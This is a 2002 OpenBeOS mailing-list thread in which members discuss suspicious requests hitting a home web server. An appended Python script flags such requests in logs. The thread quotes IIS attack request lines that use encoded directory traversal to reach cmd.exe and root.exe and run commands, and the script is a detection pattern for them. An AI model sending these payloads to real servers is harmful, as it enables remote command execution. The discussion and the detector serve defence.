[openbeos] Re: SV: I think someone tried to hack into my machine

  • From: RichardCrawford <RichardCrawford@xxxxxxxxxxxxx>
  • To: openbeos@xxxxxxxxxxxxx
  • Date: Tue, 19 Mar 2002 07:32:48 -0800 (-0800)

Actually, I noticed some rather odd requests on a temporarily running 
web server on my IP the other day. I just took it as noise from the 
local network, but if it happens again I will note it more thoroughly.


> It can sure be a hacker.. But it could be a virus somewhere that is
> trying all those IE hacks..
> We see those things in our web log files every day at work..
> 
> //Mikael H , #E-1613
> 
> > -----Original Message-----
> > From: openbeos-bounce@xxxxxxxxxxxxx
> > [mailto:openbeos-bounce@xxxxxxxxxxxxx] On Behalf Of Daniel Reinhold
> > Sent: 19 March 2002 08:49
> > To: Public OBOS mailing list
> > Subject: [openbeos] I think someone tried to hack into my machine
> >
> >
> > Ok, this was rather interesting. It happened just about fifteen
> > minutes ago (as I'm writing this).
> >
> > I'm online (PPP dialup) and am also running a local webserver (i.e.
> > sending requests to loopback address 127.0.0.1). Yeah, that's asking
> > for trouble, at least theoretically. That is, someone on the internet,
> > if they happened to get a hold of my (temporary, dynamically assigned)
> > IP, could send requests for local files and have them sent back out
> > across the network. I've never had anything weird happen before, so
> > I've always been pretty blase about the security risk.
> >
> > Anyway, I'm just testing some news items locally before copying them
> > over to the OpenBeOS website (which is my usual MO). Suddenly, I notice
> > the Terminal window (largely covered by another window, but partially
> > showing) has a flurry of text flying by and the DUN replicant in the
> > Deskbar shows lots of bytes transmitting back and forth. Wtf? So I
> > uncover the Terminal window (which is running the webserver) and see
> > that a number of unusual requests have just been attended to. Here's
> > the first one:
> >
> > GET /scripts/root.exe?/c+dir HTTP/1.0
> > Host: www
> > Connnection: close
> >
> > The remaining requests all look like that but with different URLs.
> > Here are the other URLs that were requested:
> >
> > GET /MSADC/root.exe?/c+dir HTTP/1.0
> > GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> > GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> > GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> > GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> > GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> > GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> > GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> > GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> >
> > To me, that looks all the world like some hacker trying to grab files
> > from my local machine. Could there be another explanation?
> >
> > Of course, I'm running BeOS (and don't have NT) so my local webserver
> > just returned a bunch of 404 (Not found) responses. Still, makes you
> > wonder.
> >
> > Has anyone else on this list had any similar experiences? What do you
> > make of this?
> >
> >
> 
> 
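
Requests like the ones quoted in this thread can be flagged in a web log by decoding each path the way a lenient server would before inspecting it. The following is an added example, not part of the original messages; the function names and reason labels are hypothetical, chosen for illustration.

```python
import re
from urllib.parse import unquote_to_bytes
# Request lines copied from the quoted message, plus one constructed benign line.
SAMPLES = [
    "GET /scripts/root.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /index.html HTTP/1.0",  # constructed
]
PROBED_NAMES = (b"cmd.exe", b"root.exe")  # file names requested in the quoted log

def decode_fully(raw, max_rounds=4):
    """Percent-decode until nothing changes; return (bytes, rounds needed)."""
    rounds = 0
    while rounds < max_rounds:
        nxt = unquote_to_bytes(raw)
        if nxt == raw:
            break
        raw, rounds = nxt, rounds + 1
    return raw, rounds

def fold_overlong(data):
    """Map 0xC0/0xC1 + one byte to the ASCII byte a lenient UTF-8 decoder yields."""
    fold = lambda m: bytes([((m[0][0] & 0x1F) << 6) | (m[0][1] & 0x3F)])
    return re.sub(rb"[\xc0\xc1].", fold, data, flags=re.S)

def classify(request_line):
    """Return the set of reasons (hypothetical labels) a request looks like a probe."""
    parts = request_line.split()
    if len(parts) != 3:
        return {"malformed-request-line"}
    path = parts[1].split("?", 1)[0].encode("latin-1")
    decoded, rounds = decode_fully(path)
    folded = fold_overlong(decoded)
    segments = folded.replace(b"\\", b"/").split(b"/")
    reasons = set()
    if rounds > 1:  # e.g. %255c -> %5c -> backslash
        reasons.add("double-percent-encoding")
    if folded != decoded:  # 0xC0/0xC1 are never valid in strict UTF-8
        reasons.add("overlong-utf8-bytes")
    if b".." in segments:
        reasons.add("directory-traversal")
    if segments[-1].lower() in PROBED_NAMES:
        reasons.add("probed-file-name")
    return reasons

if __name__ == "__main__":
    for line in SAMPLES:
        print(sorted(classify(line)) or ["clean"], line)
```

Checking the path only after every decoding layer is removed is what catches the `%255c` and `%c1%1c` variants, which contain no literal `..\` or `../` sequence in the raw request.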


